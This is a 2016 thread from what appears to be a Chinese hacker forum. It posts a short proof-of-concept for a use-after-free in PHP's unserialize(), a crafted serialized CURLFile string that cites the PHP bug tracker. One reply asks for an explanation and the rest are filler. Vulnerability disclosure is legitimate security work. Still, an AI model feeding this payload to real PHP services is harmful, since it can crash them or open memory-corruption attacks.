请选择 进入手机版 | 继续访问电脑版
查看: 4601|回复: 2730

[Other] PHP 5.6.26/7.0.11 Use After Free in unserialize() Vulnerability

[复制链接]
  • TA的每日心情
    奋斗
    3 天前
  • 签到天数: 551 天

    [LV.9]以坛为家II

    发表于 2016-10-19 16:08:53 | 显示全部楼层 |阅读模式
    PoC:

    [PHP] 纯文本查看 复制代码
    <?php
    
    $poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
    unserialize($poc);
    
    ?>


    来源:https://bugs.php.net/bug.php?id=73147
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    3 小时前
  • 签到天数: 297 天

    [LV.8]以坛为家I

    发表于 2016-10-19 17:35:35 | 显示全部楼层
    90大大这是什么意思:'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}'求解释
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 18:32:38 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 19:08:38 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 21:28:19 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 21:52:08 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 22:18:05 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-10-20 01:00:28 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-10-20 02:23:36 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-10-20 03:02:43 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表